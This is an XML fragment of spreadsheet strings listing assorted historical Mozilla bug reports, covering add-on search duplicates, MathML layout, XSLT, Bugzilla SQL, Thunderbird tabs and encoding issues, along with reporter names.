  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-500512</t>
  </si>
  <si>
    <t>Add-ons listed twice in search results if they have a localized name for the current locale</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 de-DE rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Build Identifier: 
If an experimental addon appears to be first one in the search results page it is listed twice. Seems only to appear on the german addon site not the english one. Originally found with addon Vlc context menu Another random example: search for SnomDial.
Reproducible: Always
Steps to Reproduce:
1. enter vlc in the search field at http://addons.mozilla.org/de
2. enter kontextmenÃ¼ and scroll the list to find the same addon
3. enter vlc at the english site - http://addons.mozilla.org
Actual Results:  
1. -&gt; addon 12042 is listed twice
2./3. -&gt; is listed once
Expected Results:  
in the special case of 1. the addon should be listed once only as in 2. and 3.</t>
  </si>
  <si>
    <t>axcy72n02</t>
  </si>
  <si>
    <t>CORE-412897</t>
  </si>
  <si>
    <t>denominator scriptlevel should be increased by 1 when displaystyle=false</t>
  </si>
  <si>
    <t>http://www.w3.org/TR/2007/WD-MathML3-20071214/chapter3.html#presm.mfrac
The mfrac element sets displaystyle to false or if it was already false increments scriptlevel by 1 within numerator and denominator.
Appears to be a regression from this
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;file=nsMathMLmfracFrame.cpp&amp;branch=&amp;root=/cvsroot&amp;subdir=mozilla/layout/mathml/base/src&amp;command=DIFF_FRAMESET&amp;rev1=1.67&amp;rev2=1.68</t>
  </si>
  <si>
    <t>CORE-330305</t>
  </si>
  <si>
    <t>DeCOMtaminate nsIFrameSelection.h</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1
nsIFrameSelection should be deCOMtaminated
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>MOZILLA_METRICS-490016</t>
  </si>
  <si>
    <t>Data/Backend Reports</t>
  </si>
  <si>
    <t>MOZILLA_METRICS</t>
  </si>
  <si>
    <t>Missing AMO stats from 4/22</t>
  </si>
  <si>
    <t>https://addons.mozilla.org/en-US/statistics/addon/10900
We seemed to have skipped April 22 for downloads and update pings.</t>
  </si>
  <si>
    <t>CALENDAR-270903</t>
  </si>
  <si>
    <t>calICalendar updates</t>
  </si>
  <si>
    <t>Updates to calICalendar.idl as per irc discussion some cleanup on the item
getters and some other bits.</t>
  </si>
  <si>
    <t>SEAMONKEY-24181</t>
  </si>
  <si>
    <t>Old folders in builds no longer needed</t>
  </si>
  <si>
    <t>Both the /throbber/ and the /toolbar/ folders in the res:// dir are old and
moldy.  While viewer still uses the /throbber/ folder it has its own throbber
already and makes having another one pointless.  The /toolbar/ folder held
images for early versions of apprunner's chrome which is now housed in
/chrome/.</t>
  </si>
  <si>
    <t>kerz</t>
  </si>
  <si>
    <t>SOCORRO-482419</t>
  </si>
  <si>
    <t>crash stats server often times out</t>
  </si>
  <si>
    <t>While trying to query the crash stats server the query often times out:
Connection Interrupted
The connection to the server was reset while the page was loading.
The network link was interrupted while negotiating a connection. Please try again.
Steps:
1. Go to the crash stats server
2. Select 'Firefox' 'Firefox 3.0' 'Mac OS X'
3. Open 'Advanced' and enter 4 weeks
4. Enter 'GetCharWidth' in the stack signature box
5. In the popup choose 'contains'
6. Click on 'Filter Crash Reports'
Result: very frequent connection timeout errors
Pinging crash-stats.mozilla.com shows consistent 100ms latency</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-435562</t>
  </si>
  <si>
    <t>Annoyance Blocking</t>
  </si>
  <si>
    <t>Ads on Nautiljon</t>
  </si>
  <si>
    <t xml:space="preserve">User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X fr rv:1.8.1.14) Gecko/20080512 Camino/1.6.1 (MultiLang) (like Firefox/2.0.0.14)
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X fr rv:1.8.1.14) Gecko/20080512 Camino/1.6.1 (MultiLang) (like Firefox/2.0.0.14)
There are ads on this website : http://www.nautiljon.com/ (on the right hand side)
Reproducible: Always
Steps to Reproduce:
1.Go to http://www.nautiljon.com/
2.See the ads on the right
Actual Results:  
Ads
Expected Results:  
No ads
Here is the code : 
                        PublicitÃ©
        </t>
  </si>
  <si>
    <t>THUNDERBIRD-473936</t>
  </si>
  <si>
    <t>Use javascriptConsole as Error Console menuitem id for better extension compatibility</t>
  </si>
  <si>
    <t>Firefox and Calendar are using javascriptConsole as menuitem id for the Error Console and I'm adding the same for SeaMonkey in bug 473665. Thunderbird is using javaScriptConsole (different case). You might want to switch as well. I'll attach a patch that includes the TB changes. MXR/comm-central says that at least Venkman and DOMI would need to be changed as well but I don't know about existing 3rd-party extensions.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-447751</t>
  </si>
  <si>
    <t>Account merge request</t>
  </si>
  <si>
    <t>I would like to merge honza@allpeers.com into odvarko@gmail.com.</t>
  </si>
  <si>
    <t>CORE-355068</t>
  </si>
  <si>
    <t>XSLTProcessor.transformToFragment seems to use only output method text</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
In the small program I add here it happens all the time. In my major project (which i cannot attach here) it seems to happen only when the document passed to the transformToFragment has a hash in its url (local anchor) but I am not sure.
In this example I tried 3 different versions of translating but none was helpful
Reproducible: Always
Steps to Reproduce:
Please see attached files for example.
html.html
==========
		XSLT Bug test
		Hello
		Bye
xml.xml 
========
		Why
		this
		is
		not
		translated
		into
		an
		UL
		list?
xsl.xsl
========
js.js
======
function go()
{
	//// load the stylesheet
	var reqXsl = new XMLHttpRequest()
	reqXsl.open(GET ./xsl.xsl false)
	reqXsl.overrideMimeType('text/xml')
	reqXsl.send(null)
	//// load the data
	var reqXml = new XMLHttpRequest()
	reqXml.open(GET ./xml.xml false)
	reqXml.overrideMimeType('text/xml')
	reqXml.send(null)
	var xsltProcessor = new XSLTProcessor()
	xsltProcessor.importStylesheet( reqXsl.responseXML.documentElement )
	var where= document.getElementById(idTarget)
	//// none of these 3 options works
	var transmode= 1
	if (transmode == 1)
	{
		//// Option 1 - Fails: transform like text
		var nodeFragment= xsltProcessor.transformToFragment( reqXml.responseXML.documentElement document )
		where.appendChild(nodeFragment)
	}
	else if (transmode == 2)
	{
		//// Option 2 - Fails: transform like text
		var docTemp = document.implementation.createDocument(  null)
		var nodeFragment= xsltProcessor.transformToFragment( reqXml.responseXML.documentElement docTemp )
		var nodeInOurDoc= document.importNode(nodeFragment true)
		where.appendChild(nodeInOurDoc)				
	}
	else if (transmode == 3)
	{
		//// Option 3 - Fails: translated-document has no documentElement
		var docTemp = xsltProcessor.transformToDocument( reqXml.responseXML.documentElement )
		if ( docTemp.documentElement )
		{
			var nodeInOurDoc= document.importNode(docTemp.documentElement true)
			where.appendChild(nodeInOurDoc)
		}
		else
		{
			alert('no documentElement')
		}
	}
	document.body.appendChild( document.createTextNode( transmode ) )
}
Actual Results:  
the translation ignores all html-tags and only text is output. When I look in the DOM inspector for the fragment I get only one node of #text (containing unformatted text from all expected nodes) instead the expected tree (in the example a UL node with many LI nodes).</t>
  </si>
  <si>
    <t>carmil1</t>
  </si>
  <si>
    <t>CORE-418334</t>
  </si>
  <si>
    <t>Meta hotkeys cannot be intercepted on Firefox Mac in an editable area</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9b3) Gecko/2008020511 Firefox/3.0b3
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9b3) Gecko/2008020511 Firefox/3.0b3
The ability to intercept hotkeys in JavaScript is important for web based editors since they need to keep track of the changes that the user have made. On Firefox Mac all meta hotkeys cannot be intercepted by JavaScript with key events. This is really bad for web based editors since people would be able to change the document with hotkeys (e.g. Meta-X Meta-V Meta-Z etc.) without the editor knowing about it. Also it makes it impossible for a web based editor to implement its own undo/redo system to work with Firefox Mac.
Reproducible: Always
Steps to Reproduce:
1. Make an HTML that intercepts keydown events with document.addEventListener('keydown' ...)
2. Make the HTML document editable with document.designMode = 'on'
3. Open the editable HTML in Firefox for Mac.
4. Try to press some Meta key combos in the editable document - they can never be properly intercepted by the keydown event handler.
Actual Results:  
Meta key events cannot be intercepted by JavaScript in Firefox for Mac.
Expected Results:  
Meta combo key events should be detectable in JavaScript just like Ctrl combo key events in Firefox for Windows.</t>
  </si>
  <si>
    <t>m.kou</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-166748</t>
  </si>
  <si>
    <t>focus() and blur() methods do not do anything first time a page is loaded</t>
  </si>
  <si>
    <t>When you load the attached testcase first time the focus and blur methods do not
do anything but when the page is reloaded with reload button everything works fine.
The events should document.write focus and then blur after the button.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-188825</t>
  </si>
  <si>
    <t>Missing word on front page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
The sentence ...so if the idea filing a bug and making sure it hasn't already
been reported... is incorrect.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Expected Results:  
It should read ...so if the idea of filing a bug and making sure it hasn't
already been reported.... You just have to add the of.</t>
  </si>
  <si>
    <t>Spyder1344</t>
  </si>
  <si>
    <t>THUNDERBIRD-508776</t>
  </si>
  <si>
    <t>Close tab should return to last tab the tab in view prior to the one being closed not just go to the adjacent tab when closing message (close go to previous / use z-order)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.13) Gecko/2009073021 Firefox/3.0.13
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.1) Gecko/20090715 Thunderbird/3.0b3
I have selected the Open message in a new tab option.
I have several tabs open at the same time.
I open a message by double clicking on it. The message is opened in a new tab placed to the right of the rightmost one.
When I close the message the active tab is now the one to the left of the one being closed - that is the one which was previously the rightmost one.
The desired behavior (similar to how Firefox deals with tabs) would be to re-activate the tab which was active before opening the message - in other word go back to the folder ...
Reproducible: Always
Steps to Reproduce:
1. select the Open message in a new tab option.
2. open several tabs
3. activate Inbox (or any folder)
4. open a message by double clicking on it
(The message is opened in a new tab)
5. close the message
Actual Results:  
The active tab is now the one to the left of the one just closed - that is the one which was previously the rightmost one.
Expected Results:  
The desired behavior (similar to how Firefox deals with tabs) would be to re-activate the tab which was active before opening the message - in other word go back to the folder ...</t>
  </si>
  <si>
    <t>vincenzo.dandrea</t>
  </si>
  <si>
    <t>CORE-524175</t>
  </si>
  <si>
    <t>Weight calculation wrong for selectors involving pseudo-elements</t>
  </si>
  <si>
    <t>Created attachment 408078
Testcase
This is a regression from bug 520848 pointed out in bug 508466 comment 17.  Testcase attached.
The key issue is the removal of the weight += listSel-&gt;CalcWeight() call in the old !IsSinglePseudoClass(*listSel) branch under (!nsCSSPseudoClasses::IsPseudoClass(pseudoClassList-&gt;mAtom)).</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-239192</t>
  </si>
  <si>
    <t>Attaching files from directories with '#' cuts name of attached file</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040326 Firefox/0.8.0+ (mmoy-O2-GL7-SSE2-crc32)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040325
When I attach a file from a directory which has a # in it's name (like
C:\foo#2) the name of the attached file is set to the directory name up to the
# sign.
Reproducible: Always
Steps to Reproduce:
1. mkdir c:\foo#2
2. Attach file bar.txt from this directory
Actual Results:  
The attached file is named foo (no ).
Expected Results:  
It should be named bar.txt (no ).
This bug also occurs with Mozilla Thunderbird 0.5+ (20040330) (ie. the currently
nightly).</t>
  </si>
  <si>
    <t>askwar</t>
  </si>
  <si>
    <t>BUGZILLA-305451</t>
  </si>
  <si>
    <t>GetGroupsByUserId() in buglist.cgi returns bad data</t>
  </si>
  <si>
    <t>Due to the checkin of bug 304583 I cannot see groups anymore when editing
several bugs at once. I think the problem comes from GetGroupsByUserId() in
buglist.cgi which has not been updated. I tried the following change:
Before my hack:
    my $groups = $dbh-&gt;selectall_arrayref(
       SELECT DISTINCT  groups.id name description isactive
                   FROM  groups
             INNER JOIN  user_group_map
                     ON  user_group_map.group_id = groups.id
                  WHERE  user_id = ?
                    AND  isbless = 0
                    AND  isbuggroup = 1
               ORDER BY  description 
                {Slice =&gt; {}} ($userid))
After my hack:
    my $grouplist = Bugzilla-&gt;user-&gt;groups_as_string
    my $groups = $dbh-&gt;selectall_arrayref(
       SELECT DISTINCT  id name description isactive
                   FROM  groups
                  WHERE  id IN ($grouplist)
                    AND  isbuggroup = 1
               ORDER BY  description 
                {Slice =&gt; {}})
Now groups are displayed but the wrong groups are shown. I have no idea if the
problem is specific to my hack or if there is something more serious about User.pm.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-436500</t>
  </si>
  <si>
    <t>add qm-centos5-04 to unittest production</t>
  </si>
  <si>
    <t>qm-centos5-01 was cloned and the copy named qm-centos5-04. This will be a replacement for qm-centos5-03 which is moving to moz2.</t>
  </si>
  <si>
    <t>CORE-376534</t>
  </si>
  <si>
    <t>8s in missing glyph boxes are ambiguous</t>
  </si>
  <si>
    <t>The hexidecimal 8s in missing glyph boxes are ambiguous they can be confused with Bs particularly when Bs aren't visible.
Steps to reproduce: load data:text/html
Expected results: missing glyph box looks like FB CA
Actual results: missing glyph box should clearly be F8 CA
Perhaps the 8 should be:
  XX
XX  XX
  XX
XX  XX
  XX
instead of
XXXXXX
XX  XX
XXXXXX
XX  XX
XXXXXX
?</t>
  </si>
  <si>
    <t>NSS-294555</t>
  </si>
  <si>
    <t>unexported api calls in p12plcy.h</t>
  </si>
  <si>
    <t>The following api calls in p12plcy.h are not found in a .def file.
SEC_PKCS12DecryptionAllowed NOT exported
SEC_PKCS12GetPreferredEncryptionAlgorithm NOT exported
SEC_PKCS12GetStrongestAllowedAlgorithm NOT exported</t>
  </si>
  <si>
    <t>jason.m.reid</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-60377</t>
  </si>
  <si>
    <t>[RFE] Support IMAP STARTTLS command</t>
  </si>
  <si>
    <t>Add support for the STARTTLS IMAP command which allows a client to request the
communication channel be changed from cleartext to SSL/TLS after a session has
started.  This IMAP extension is documented in RFC 2595 available here:
http://www.imc.org/rfc2595.
The Linux imapd included in the imap-2000 package from Redhat supports this
extension.</t>
  </si>
  <si>
    <t>ataylor+origacct</t>
  </si>
  <si>
    <t>BUGZILLA-76862</t>
  </si>
  <si>
    <t>mysqlwatcher.pl is not executable.</t>
  </si>
  <si>
    <t>mysqldwatcher.pl should be added to the executable files in checksetup.pl or
moved to contrib.</t>
  </si>
  <si>
    <t>CORE-66934</t>
  </si>
  <si>
    <t>window.print() from javascript as page loads causes crash</t>
  </si>
  <si>
    <t>Articles at thestreet.com have a 'print this page' link which points to a
printer-friendly version. The printer friendly page contains javascript which
calls windows.print() immediately.  If you click  on the print dialog
mozilla crashes.  However if you click  you can successfully print
using the print button.  At the time the dialog box appears neither the page
title nor contents have been rendered.  Possibly trying to print before other
steps are complete?  I'll attach a test case as well.</t>
  </si>
  <si>
    <t>mack</t>
  </si>
  <si>
    <t>BUGZILLA-387831</t>
  </si>
  <si>
    <t>Deleting products does not clean up the component_cc table</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Build Identifier: 
Bugzilla does not clean up the component_cc table when you delete the product.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-196102</t>
  </si>
  <si>
    <t>Enable WSDL by default in mozilla</t>
  </si>
  <si>
    <t>Currently WSDL can be used only if the environment variable MOZ_WSP is set and
extensions/interfaceinfo ( that WSDL depends on ) is built. To make
development/testing easier it would be a good thing to enable WSDL by default in
mozilla builds</t>
  </si>
  <si>
    <t>CORE-276705</t>
  </si>
  <si>
    <t>XMLHttpRequest throws exception if header requested with getResponseHeader doesn't exist</t>
  </si>
  <si>
    <t>According to nsIXMLHttpRequest.idl and other descriptions the return value is
A string containing the text of the header specified. NULL if the response has
not yet been received or the header does not exist in the response.
But in reality (trunk 20041231) Mozilla throws an exception if the header is not
available: 0x80040111 NS_ERROR_NOT_AVAILABLE.
Is the bug in the code or in the documentation? I'd prefer getting null.</t>
  </si>
  <si>
    <t>CORE-162358</t>
  </si>
  <si>
    <t>NSPR needs UCS2 interface</t>
  </si>
  <si>
    <t>This is a split from 58866.
We need to have a set of new NSPR_UCS2 interfaces for 
accessing the Unicode file system.</t>
  </si>
  <si>
    <t>CORE-294893</t>
  </si>
  <si>
    <t>Major leakage on Linux balsa Dep GTK1 (gcc 3.4)</t>
  </si>
  <si>
    <t>As of the 2005-05-19 20:26 build trace_malloc_leakage on this build has
skyrocketed from 300k to 1.35MB
I've attempted to CC everyone who checked in something that might relate to this
bug. I apologize if I was overzealous here I'm trying to do the best I can
while not knowing an awful lot about Tinderbox / build mechanisms.
Leak graph:
http://build-graphs.mozilla.org/graph/query.cgi?tbox=balsa&amp;testname=trace_malloc_leaks&amp;autoscale=1&amp;size=&amp;days=7&amp;units=bytes&amp;ltype=&amp;points=&amp;avg=1&amp;showpoint=
Bonsai timeframe:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2005-05-19+17%3A52%3A00&amp;maxdate=2005-05-19+20%3A26%3A00&amp;cvsroot=%2Fcvsroot
Note: this probably doesn't belong in Firefox &gt; General but I have no idea
where else it ought to go for now. In a somewhat similar timeframe the
Seamonkey build also got 200k extra leakage - I don't know if this is related.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-523070</t>
  </si>
  <si>
    <t>Remove useless commented out certdbkeycol tree columns</t>
  </si>
  <si>
    <t>Created attachment 406984
rm
History because you're bound to have forgotten it by now:
A never-implemented idea for cert UI was going to only load part of the data into memory and use the db key to look up the rest as needed. That wouldn't actually call for putting the key in the UI but it was put in in a collapsed column until bug 82886 objected to the blank in the column picker from the unlabeled column at which point the column was commented out in the XUL and the code to fill in the data was commented out leaving it around in case someone wanted to uncomment it for debugging. That was August 2001.
Then in bug 169932 the code that fills in the data was removed so even if someone did uncomment the XUL it wouldn't ever actually show anything. That was September 2002 so for the last seven years the commented out columns have been doing nothing at all.</t>
  </si>
  <si>
    <t>CALENDAR-313489</t>
  </si>
  <si>
    <t>readOnly attribute should not persist between sessions</t>
  </si>
  <si>
    <t>After a few days of testing everyone seems to be agreed that it would be better for the readOnly attribute to be re-evaluated every time Sunbird/Lightning starts up.  The most common error would be a network failure which would fix itself automatically.  Right now the user needs to manually remove the readOnly flag from the calendar in this case.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-496526</t>
  </si>
  <si>
    <t>update www.mozilla.org with new office location</t>
  </si>
  <si>
    <t>We should update http://www.mozilla.org/contact/ (and perhaps other pages?) to reflect the office move.  The new office mailing address is I'm told:
Mozilla
650 Castro Street Suite 300
Mountain View CA 94041
This probably ought to be done sometime (late?) today.
See also bug 496525 for www.mozilla.com.</t>
  </si>
  <si>
    <t>CORE-397783</t>
  </si>
  <si>
    <t>Remove lots of redundant nsISupportsArray include/forward definitions from content</t>
  </si>
  <si>
    <t>Created attachment 282565
The fix (checked in)
nsISupportsArray is obsolete and should go away but in either case the includes and forward definitions in the patch I'm attaching are just redundant.
I've successfully compiled FF SM and TB on Linux with this patch. Shouldn't affect anything other than compilation speed.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-349007</t>
  </si>
  <si>
    <t>Trunk XULRunner doesn' t package with modern PackageMaker</t>
  </si>
  <si>
    <t>PackageMaker 2.1 on MacIntel 10.4.7:
XULRunner packaging fails at the step which calls PackageMaker. After a little debugging I found the following error:
The package was completed with the following non-fatal errors:
Invalid version 1.9a1 (must have format 1.2.3).
The packagemaker command returns exit code 1. Since I do not want to alter the version number I'm going to try and hack around the exit code.</t>
  </si>
  <si>
    <t>CORE-413318</t>
  </si>
  <si>
    <t>canvas3d build break</t>
  </si>
  <si>
    <t>Created attachment 298238
fix
Canvas3d doesn't build on trunk the fix is simple. (Not sure what broke it though.) The built extension works fine.</t>
  </si>
  <si>
    <t>BUGZILLA-223878</t>
  </si>
  <si>
    <t>Flag system dies when changing a deleted flag</t>
  </si>
  <si>
    <t>Bizarre collision inside attachment.cgi. The following is a sequence of actions
that seemed to cause it:
1. I loaded from bug 190042
http://bugzilla.mozilla.org/attachment.cgi?id=134272&amp;action=edit which had a
review request for me.
2. Vladd cancelled the review request.
3. I then set r- the patch and added a snide comment. I submitted the form and
got back a 500 internal server error.
4. Somewhere between the above bryner also placed a review request on bug
128673 for http://bugzilla.mozilla.org/attachment.cgi?id=134273&amp;action=edit
Results:
- My r- was placed on attachment 134273
- My comment was placed on the correct bug
- No r- was placed on attachment 134272
Note that the attachment IDs are sequential.</t>
  </si>
  <si>
    <t>CORE-160683</t>
  </si>
  <si>
    <t>Wrong text selection when double clicking legend text in fieldset</t>
  </si>
  <si>
    <t>Sometimes when you double click the first word in a  it
selects wrong text. Eg Double click the word 'Your' in the 'Your Details' Legend
in the following page...
http://www.wdcpaip.org.uk/questionnaire/index.html</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-353508</t>
  </si>
  <si>
    <t>Typos that didn't make the Firefox 2.0 RC1 lockdown deadline</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-371539</t>
  </si>
  <si>
    <t>Need to remove 1.8.1.2 blocking and approval flags</t>
  </si>
  <si>
    <t>Gecko 1.8.1.2 has been shipped. We should remove the flags so ignorant people like me can't set them.</t>
  </si>
  <si>
    <t>BUGZILLA-272347</t>
  </si>
  <si>
    <t>Get the Windows install guide either moved into the documentation or the Bugzilla website</t>
  </si>
  <si>
    <t>We have a pressing need (like before December 1st?) to get the Installing
Bugzilla on Windows guide off of Byron's website.  As it turns out the page
has wound up being immensely popular and he's pushed over a gigabyte of traffic
from his website for the month of November so far.  And this hasn't exactly made
his ISP happy (it's over 10 times the traffic generated by any other site
hosted on the ISP I believe is what he said).
bugzilla.org has more than enough bandwidth available to handle it.
The page doesn't need to stay 100% intact we just need to make sure the content
all makes it (the step by step and ideally the screenshots as well).  Having it
in the os-specific section in the docs probably wouldn't hurt.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-497591</t>
  </si>
  <si>
    <t>Selecting Tab Bar always stays visible will crash camino when a very small window is present</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.4 en rv:1.9.0.11) Gecko/2009060219 Camino/2.0b3 (like Firefox/3.0.11)
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.4 en rv:1.9.0.11) Gecko/2009060219 Camino/2.0b3 (like Firefox/3.0.11)
Under some circumstances doing a search on tripadvisor for a hotel for example scole inn and then clicking on the search result will crash camino.  The following error will appear in the console: camino[304] Mozilla has caught an Obj-C exception [NSRangeException: *** -[NSCFArray objectAtIndex:]: index (1) beyond bounds (1)]. I encountered this in normal browsing but it's easiest to reproduce a similar or same crash following steps below.
Reproducible: Always
Steps to Reproduce:
1.Start with clean profile following procedure in Camino FAQ or use troubleshoot camino
2.Set preference Open tabs instead of windows for links that would open new windows
3.Go to tripadvisor.com and search for scole inn and select first search result
4. Click Window and note presence of hidden popunder window. The presence of the popunder window seems needed to produce a crash.
5. Go to preferences and select Tab bar always stays visible.
Actual Results:  
On my system Camino will crash.
Expected Results:  
Tab Bar is displayed. I am not sure how Camino is supposed to handle the hidden window that is already there when you select always display tab bar or how Camino is expected to handle a popunder window if the open tabs instead of windows for links that would open new windows preference has been selected.
The tripadvisor site sets a cookie call CommercePopUnder and the presence of this cookie and value seems to have something to do with the crash. For example Camino will NOT crash if the cookie is present with the value SuppressAll.</t>
  </si>
  <si>
    <t>russcgaboy</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-436762</t>
  </si>
  <si>
    <t>please make nagios ignore 'nightly' builders on Mozilla2 and Actionmonkey tinderboxes</t>
  </si>
  <si>
    <t>These builders only report once a day and as such fall off daily. No point in nagios warning about it every time.</t>
  </si>
  <si>
    <t>CORE-415474</t>
  </si>
  <si>
    <t>Assert in js_AtomizeString with Trunk and 2+ threads</t>
  </si>
  <si>
    <t>After pulling down the latest truck I know have the following assert anytime I run two or more threads against JS.
JS_ASSERT(JSSTRING_IS_ATOMIZED(key))
The assert hits from all kinds of different places in the code with various strings. ex:  js_InitCommonAtoms() etc..
Nothing on my end has changed which would cause this to occur.
I'm running with thin locks now per bug #353962 but I have no idea if this is related.  Lots of changes in the last few months. GC changes too.  Not sure where to look next...???  Last pull of trunk was December 07.</t>
  </si>
  <si>
    <t>FIREFOX-429637</t>
  </si>
  <si>
    <t>Tooltip background becomes transparent</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 sv-SE rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 sv-SE rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Tooltip background becomes transparent when window background color is set to an explicit color.
Reproducible: Always
Steps to Reproduce:
1. Set window background color to a specific color (I use light gray - makes text easier to read)
2. Go to www.idg.se
3. Hover mouse above the news at the top in the middle column
Actual Results:  
A tooltip with transparent background appears
Expected Results:  
It should be yellow or gray
For me the severity is normal but for others I guess it's trivial.</t>
  </si>
  <si>
    <t>andreas.ogren</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-479495</t>
  </si>
  <si>
    <t>periodically reload personas data</t>
  </si>
  <si>
    <t>The extension used to reload personas data every half hour but the current version of the extension doesn't do that anymore it just loads the data once on startup.  It should load data periodically thereafter so personas data doesn't go stale for users who leave their browsers running for days.
telliott cbeard: to ensure scalability how often should the extension reload the data?  Is the former interval of half an hour ok or should it be less frequent?
The related question is how often personas data changes since if it doesn't change very frequently then there's no reason to reload it so frequently even if we're capable of scaling to that frequency.</t>
  </si>
  <si>
    <t>CORE-78536</t>
  </si>
  <si>
    <t>image frame should report specified size even if image does not exist</t>
  </si>
  <si>
    <t>Look at the testcase from bug 72393
http://bugzilla.mozilla.org/showattachment.cgi?attach_id=28079 . In the bottom
row the images contain something like foo_bar[1].gif. Mozilla is not able to
find these images but it should report the specified size to the upper frames.
This is probably a dupe but I would like to keep track of it.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-465586</t>
  </si>
  <si>
    <t>forwarding inline base64 breaks non-English codepage</t>
  </si>
  <si>
    <t>1. Load some base64 mail in non-Western codepage.
2. Forward it as inline.
3. The non-Western characters are broken. Cyrillic is not readable at all.
For example Estonian word: MÃ¼Ã¼ja = M=C3=BC=C3=BCja. Russian is forwarded in that way: =D2=CE=CB=DC=CA=CE.
When the mail is complete base64 the it is forwarded as code:
0J/RgNC40LLQtdGC0LjQuiwg0JbQtdC90YwuDQoNCtCQINGN0YLQviDQtdCy0YDQvtCy0YvQuSDR...
First seen in TB20081112.</t>
  </si>
  <si>
    <t>NSS-81246</t>
  </si>
  <si>
    <t>pk12util uses hardcoded r-only /tmp/Pk12uTemp file</t>
  </si>
  <si>
    <t>if one program terminates without removing the file a different user can never
use pk12util -i on this machine again. The errormessage is missleading:
$ pk12util -i Alice.p12 -d ../tools/copydir -k ../tests.pw.20169 -w
../tests.pw.20169
pk12util: PKCS12 decode not verified: security library: improperly formatted
DER-encoded message.
the QA scripts work around the problem by checking for the existance of this
file after pk12util return code indicates error and outputing the following message:
Error: pk12util temp file exists. Please remove this file and
       rerun the test (/tmp/Pk12uTemp)</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-483291</t>
  </si>
  <si>
    <t>kk / Kazakh</t>
  </si>
  <si>
    <t>[kk] Firefox protocol handler setup for Kazakh</t>
  </si>
  <si>
    <t>Protocol handlers are a new feature in Firefox 3.5 that allows links like mailto:nobody@mozilla.org to be handled by a webmail application.
In order to do that the site needs to support a special API described on http://developer.mozilla.org/en/docs/Web-based_protocol_handlers.
For en-US we're currently shipping with GMail and Yahoo! Mail for mailto: and 30boxes for webcal: urls and we're on a ongoing evangelism effort to add more. We're going to add support for irc links to mibbit.com soon. For Kazakh we'd like to do that too.
First the localization team and Stas (Stas Malolepszy) will look at the market for the language and come up with a good candidates. Timur we'll need your input on this the guidelines for making recommendations are on http://wiki.mozilla.org/Firefox_web_services_guidelines. Following that is a reach out by the evangelism team to try to get the vendor to support protocol handlers.
Once that happens Stas will take over in reviewing the actual implementation which will need to change the gecko.handlerService.* entries in kk/browser/chrome/browser-region/region.properties. Please don't make changes to that file without getting a positive review by Stas or somebody else appointed by Stas/Sethb on a patch for that change upfront.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-280243</t>
  </si>
  <si>
    <t>WINCE uriloader changes</t>
  </si>
  <si>
